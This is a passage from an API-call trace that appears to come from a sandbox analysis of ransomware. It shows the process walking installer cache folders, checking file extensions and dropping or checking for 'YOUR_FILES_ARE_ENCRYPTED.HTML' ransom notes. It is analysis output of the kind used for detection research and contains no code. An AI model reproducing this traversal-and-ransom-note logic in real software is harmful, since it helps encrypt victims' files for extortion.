nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.182] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0170.182] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0170.182] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.182] GetProcessHeap () returned 0x270000 [0170.183] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0170.183] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccb04ea0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xccb04ea0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccb04ea0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.183] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0170.183] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") 
returned 0 [0170.183] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccb04ea0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xccb04ea0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccb04ea0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.183] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0170.183] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0170.183] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.183] GetProcessHeap () returned 0x270000 [0170.184] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0170.184] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf993abb0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xccc5bb00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccc5bb00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, 
cFileName="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", cAlternateFileName="{BD95A~1.610")) returned 1 [0170.184] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030") returned 86 [0170.184] GetProcessHeap () returned 0x270000 [0170.184] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0170.184] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030" [0170.184] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*" [0170.184] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf993abb0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xccc5bb00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccc5bb00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0170.184] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf993abb0, 
ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xccc5bb00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccc5bb00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.185] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xccc359a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccc359a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 1 [0170.185] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages") returned 95 [0170.185] GetProcessHeap () returned 0x270000 [0170.185] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0170.185] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages" [0170.185] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*") returned="\\\\?\\C:\\Users\\All Users\\Package 
Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*" [0170.185] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xccc359a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccc359a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0170.185] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xccc359a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccc359a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.185] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xccc5bb00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccc5bb00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0170.185] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86") returned 116 [0170.185] GetProcessHeap () returned 
0x270000 [0170.185] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0170.185] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86" [0170.185] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*" [0170.185] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xccc5bb00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccc5bb00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.186] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xccc5bb00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, 
ftLastWriteTime.dwLowDateTime=0xccc5bb00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.186] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf833b400, ftCreationTime.dwHighDateTime=0x1ced524, ftLastAccessTime.dwLowDateTime=0xf833b400, ftLastAccessTime.dwHighDateTime=0x1ced524, ftLastWriteTime.dwLowDateTime=0xccca7dc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0xc89b1, dwReserved0=0x0, dwReserved1=0x60, cFileName="cab1.cab.D11358EA808524D3D6008A62E8739B529E74AC1D8557AD9C7DDB1837BF6C7D65", cAlternateFileName="CAB1CA~1.D11")) returned 1 [0170.186] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.D11358EA808524D3D6008A62E8739B529E74AC1D8557AD9C7DDB1837BF6C7D65") returned 190 [0170.186] lstrcmpW (lpString1="cab1.cab.D11358EA808524D3D6008A62E8739B529E74AC1D8557AD9C7DDB1837BF6C7D65", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.186] PathFindExtensionW (pszPath="cab1.cab.D11358EA808524D3D6008A62E8739B529E74AC1D8557AD9C7DDB1837BF6C7D65") returned=".D11358EA808524D3D6008A62E8739B529E74AC1D8557AD9C7DDB1837BF6C7D65" [0170.186] lstrlenW (lpString=".D11358EA808524D3D6008A62E8739B529E74AC1D8557AD9C7DDB1837BF6C7D65") returned 65 [0170.186] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8210100, ftCreationTime.dwHighDateTime=0x1ced525, ftLastAccessTime.dwLowDateTime=0xb8210100, ftLastAccessTime.dwHighDateTime=0x1ced525, ftLastWriteTime.dwLowDateTime=0xb8210100, ftLastWriteTime.dwHighDateTime=0x1ced525, nFileSizeHigh=0x0, 
nFileSizeLow=0x25000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0170.186] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 142 [0170.186] lstrcmpW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.186] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0170.186] lstrlenW (lpString=".msi") returned 4 [0170.186] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0170.186] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccb51160, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xccb51160, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccc359a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.186] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 146 [0170.186] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.186] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccb51160, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xccb51160, ftLastAccessTime.dwHighDateTime=0x1d7fb46, 
ftLastWriteTime.dwLowDateTime=0xccc359a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.186] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.187] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 146 [0170.187] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.187] GetProcessHeap () returned 0x270000 [0170.187] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0170.188] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccc359a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xccc359a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccc5bb00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.188] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package 
Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0170.188] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.188] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccc359a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xccc359a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccc5bb00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.188] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0170.188] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0170.188] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.188] GetProcessHeap () returned 0x270000 [0170.189] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0170.189] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccc5bb00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xccc5bb00, 
ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccc5bb00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.189] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0170.189] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.189] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccc5bb00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xccc5bb00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccc5bb00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.189] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0170.189] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0170.189] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.189] GetProcessHeap 
() returned 0x270000 [0170.190] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0170.190] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17798a50, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xccccdf20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccccdf20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", cAlternateFileName="{E6E75~1")) returned 1 [0170.190] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned 75 [0170.191] GetProcessHeap () returned 0x270000 [0170.191] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0170.191] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}" [0170.191] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*" [0170.191] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17798a50, ftCreationTime.dwHighDateTime=0x1d706a6, 
